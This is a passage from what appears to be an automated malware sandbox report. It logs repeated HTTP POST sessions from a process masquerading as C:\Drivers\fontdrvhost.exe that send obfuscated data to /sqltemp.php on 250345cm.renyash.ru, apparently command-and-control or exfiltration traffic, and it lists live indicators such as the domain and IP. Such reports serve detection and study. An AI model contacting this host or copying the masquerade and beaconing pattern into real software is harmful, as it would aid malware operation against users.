Jan 1, 2025 14:53:45.297107935 CET	1012	OUT	Data Raw: 53 54 5f 50 54 51 51 57 58 56 52 59 56 5c 59 5f 5b 5d 54 5d 55 5e 50 5b 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: ST_PTQQWXVRYV\Y_[]T]U^P[Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S._'<5Y7<='.4,-V =0?;(#1 ;)&79:&Y.,Y-5
Jan 1, 2025 14:53:45.385082960 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:45.569782019 CET	815	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r%2FzCymVj0ly86t9citZb4klNqo7FZKE7cFfg%2BLty0FPNgmMoRbOvsNguT%2BOHxhwGG%2F%2Bby%2F7jkEQKPs%2BkCIqtoFkFdhCigCglSHmpwo8PH%2BcmgqtSM8YS3mOyKaHUxfWz1WmV6mNG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2ff526ea10f6f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2092&min_rtt=1500&rtt_var=1748&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=233899&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
140	192.168.2.4	50153	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:45.702769041 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 1, 2025 14:53:46.058976889 CET	1012	OUT	Data Raw: 53 52 5f 50 51 58 51 56 58 56 52 59 56 5d 59 53 5b 58 54 5e 55 5d 50 54 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SR_PQXQVXVRYV]YS[XT^U]PTZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-&,:#1Y'A/:4><<#U)<\ +<;%A&,-*&Y.,Y-1
Jan 1, 2025 14:53:46.160018921 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:46.420586109 CET	811	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oBMCE%2BfaWOfHHPjPUfU1Mk2Mbxu%2FHIdO9kWMAAyF%2B%2FITLYk42D60yoENkGJdD%2FgnkFwaCbOsKgWZiW%2FM9Xw2A83EKBCDMOriSLeFNjBpthjSulZehA2oOTq4YABenoLiwfIBeySJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2ff5738e60f5b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7719&min_rtt=1498&rtt_var=13005&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=28475&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.4	50154	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:46.543155909 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 1, 2025 14:53:46.904887915 CET	1012	OUT	Data Raw: 53 57 5f 56 51 5f 54 55 58 56 52 59 56 5e 59 51 5b 5c 54 50 55 5d 50 54 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SW_VQ_TUXVRYV^YQ[\TPU]PTZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-39X ?1Y3?E8:#-+X< 3Y+("1,+V-&Y.,Y-
Jan 1, 2025 14:53:47.008742094 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:47.287607908 CET	802	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GwH2vD9112QFA%2BYfS8GGTxmsXVTwjJPZ3uWIDOVg0iivDopogejrI7F7FqxWojHXpOScNBXwAQzG9p6HrCFZTMDjqBwlNIyZ%2BqJSVOVWnxEKky0e2UXCKYDchV5oJKuKrii9YarE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2ff5c7c1443cd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3807&min_rtt=1748&rtt_var=4774&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=80118&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
142	192.168.2.4	50155	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:47.425374985 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 1, 2025 14:53:47.786308050 CET	1012	OUT	Data Raw: 53 52 5a 54 51 5a 54 54 58 56 52 59 56 5f 59 56 5b 53 54 5c 55 5d 50 59 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SRZTQZTTXVRYV_YV[ST\U]PYZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.'?7,!%>#;:1V4-+? (><\720(&%??:&Y.,Y-9
Jan 1, 2025 14:53:47.899344921 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:48.067704916 CET	808	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TLK5p4yv5oT%2FPtpvWtIGYlweAoVAoBME2m12DOcUGkQ7hsL3BvaNcDwU%2BbTU92nzWQ4N%2BHox6BB1ZG8XpAhKCCOFxvHOawZ8JfszBL7heEP5NsxC7HKetnWmUswq%2BOohpnn%2BAvV6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2ff620ab24237-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3985&min_rtt=1812&rtt_var=5027&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=76029&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.4	50156	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:48.331922054 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1008 Expect: 100-continue
Jan 1, 2025 14:53:48.685626984 CET	1008	OUT	Data Raw: 53 52 5f 51 54 5d 54 54 58 56 52 59 56 59 59 55 5b 58 54 5f 55 5a 50 5a 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SR_QT]TTXVRYVYYU[XT_UZPZZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-')Y4.$?@/ =()7W#4((;!B2/T,&Y.,Y-)
Jan 1, 2025 14:53:48.794903040 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:49.049679995 CET	807	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mTTQfXE58hG8mq1Hd3q8Ae8ANzbLSD90dBAlrX2X4hiZywHG%2BBtJjAY6CvAoPtZbvM1dlyAbA30c7naEYfZGQpXJHjdryMOd1qTAbiL%2BWO0%2BABgSzZVNdh%2BP6Qvh5OO8iS8YjOgE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2ff67ad788c35-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3286&min_rtt=1937&rtt_var=3424&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1303&delivery_rate=114698&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.4	50157	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:49.166752100 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 1, 2025 14:53:49.511910915 CET	1012	OUT	Data Raw: 53 55 5f 51 51 5a 54 56 58 56 52 59 56 5d 59 57 5b 5c 54 5a 55 5b 50 5a 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SU_QQZTVXVRYV]YW[\TZU[PZZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.X05[#,1_'>$.:1V!=[<:7T)=<413\<%A1<$.&Y.,Y-1
Jan 1, 2025 14:53:49.610718012 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:49.787396908 CET	808	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AkghSdF7oVYKjO2JU%2BjwPLZDfWY2IHbgh%2B%2BLpZABLPofJWZfcf4j3jGEw%2BbWNvD81CAsY2KvJK7%2FnoCftYOVpOG2V80wVR3jG0JrODoxUl52du102xhqGaSQGTIAyCK1OrOPmCbk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2ff6cc80e41f2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4051&min_rtt=1631&rtt_var=5452&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=69540&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
145	192.168.2.4	50158	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:49.920640945 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:50.277642012 CET	1012	OUT	Data Raw: 56 52 5f 57 54 5e 51 55 58 56 52 59 56 5f 59 56 5b 53 54 50 55 55 50 5c 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VR_WT^QUXVRYV_YV[STPUUP\Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.X$> =3><,\! >$Z<_;*>74"<+;5C1/7::&Y.,Y-9
Jan 1, 2025 14:53:50.365046978 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
146	192.168.2.4	50159	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:50.550461054 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1852 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:50.906358957 CET	1852	OUT	Data Raw: 53 53 5a 53 51 58 54 51 58 56 52 59 56 5c 59 55 5b 58 54 50 55 5b 50 58 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SSZSQXTQXVRYV\YU[XTPU[PXZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-'=]7?-Y3>?,7/(9')4\!1(?!%'T.&Y.,Y-5
Jan 1, 2025 14:53:51.023423910 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:51.277184010 CET	951	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NwYsGBuryt3mmOvS5jRnYjYEZvJ%2FLRimv6eD%2BegnunEfUtd1CS7eraOw5bqQEL9frC1bC3oKroxZZAQ5KNS75C2LEWwdPlc0M3VazWx1HqjWKghWrfCFxWGEoLy3UBQwyW1D1Rrz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2ff759b547c88-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4326&min_rtt=2006&rtt_var=5392&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2171&delivery_rate=70984&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1f 26 0f 2a 13 2a 56 26 54 24 11 28 04 27 56 31 3e 2d 00 3f 16 31 01 27 10 28 01 28 3a 30 00 22 05 2e 03 32 06 24 59 21 3d 3b 11 30 34 2b 59 05 1c 20 40 21 2f 06 5b 2a 03 37 5d 25 3c 31 5a 33 07 2b 06 2a 3b 33 0b 34 05 27 13 30 03 24 5c 29 5c 20 54 30 02 0d 5b 39 06 36 0b 30 10 2c 54 00 11 26 1d 25 21 12 59 23 37 3c 1f 20 32 29 13 32 1a 32 1a 26 12 2c 0b 23 17 26 15 27 32 38 06 35 0a 39 00 26 5d 25 10 23 04 34 0d 3d 3e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&*V&T$('V1>-?1'((:0".2$Y!=;04+Y @!/[7]%<1Z3+*;34'0$\)\ T0[960,T&%!Y#7< 2)22&,#&'2859&]%#4=>%S -H?WS0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
147	192.168.2.4	50160	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:50.706374884 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:51.058682919 CET	1012	OUT	Data Raw: 56 57 5f 5d 51 58 54 55 58 56 52 59 56 51 59 50 5b 52 54 50 55 5e 50 5d 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VW_]QXTUXVRYVQYP[RTPU^P]Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.$7>3>;:1 -?*9#V)= 4!#]+;%1/ 9:&Y.,Y-
Jan 1, 2025 14:53:51.146275043 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:51.408626080 CET	803	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uDkaHZmitvTv8mH8OxhxzE4PSEJEjWbEh3k07MjyY9w6tIBsuILE3cFJUkedwqKavpaYHvsOwpTY%2BWjYQIN8rV3frJEylsLMMQH0EabzvfRow1UGQRyo%2FSYI6FM1FhWYgeF1AdtS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2ff766e927ced-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2422&min_rtt=1890&rtt_var=1774&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=237282&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
148	192.168.2.4	50161	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:51.537328959 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 1, 2025 14:53:51.886874914 CET	1012	OUT	Data Raw: 56 53 5f 57 54 50 51 50 58 56 52 59 56 58 59 5f 5b 53 54 5e 55 55 50 5c 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VS_WTPQPXVRYVXY_[ST^UUP\Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.3/]7<9'=$, +)'=.\#",(8)&/+T,*&Y.,Y-%
Jan 1, 2025 14:53:51.983777046 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:52.165478945 CET	806	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t9H5xn1os5k6jxXZli3FXvp%2FbT3u%2BqiBt4f%2BFIVnhT6BqF7gdzXFC7h72FAU4DS3sS0xDsTdU1q6IgM0zOGedzm16JNpWI89qXvqpsQqgtDfocyQ8Zcg1BKxnkU9mG2QroDW%2Boh9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2ff7b9ba043c4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=8283&min_rtt=1714&rtt_var=13781&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=26902&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
149	192.168.2.4	50162	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:52.293652058 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 1, 2025 14:53:52.636948109 CET	1012	OUT	Data Raw: 56 52 5a 53 54 5b 54 57 58 56 52 59 56 58 59 52 5b 5e 54 5c 55 54 50 55 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VRZST[TWXVRYVXYR[^T\UTPUZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-0-#?.3X4/9-T#-(8=>;7<8!$/'U9*&Y.,Y-%
Jan 1, 2025 14:53:52.737909079 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:53.002363920 CET	808	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Uf6zvB1EusELm6YnI%2FjzZm4BzXZcaOjhMupoGhCIAGsBZjMBRv%2B%2BPf%2Fo9KvtiMHyQORY0KdsDf9By6SYv7NyCQf2dFq1aV8ZSw8Y8q6HK9zQ0fUs0v3EbYFdtk2I%2BiYwsoeRIvdX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2ff805bd8c470-EWR alt-svc: h3=":443"; ma=86400 server-timing: 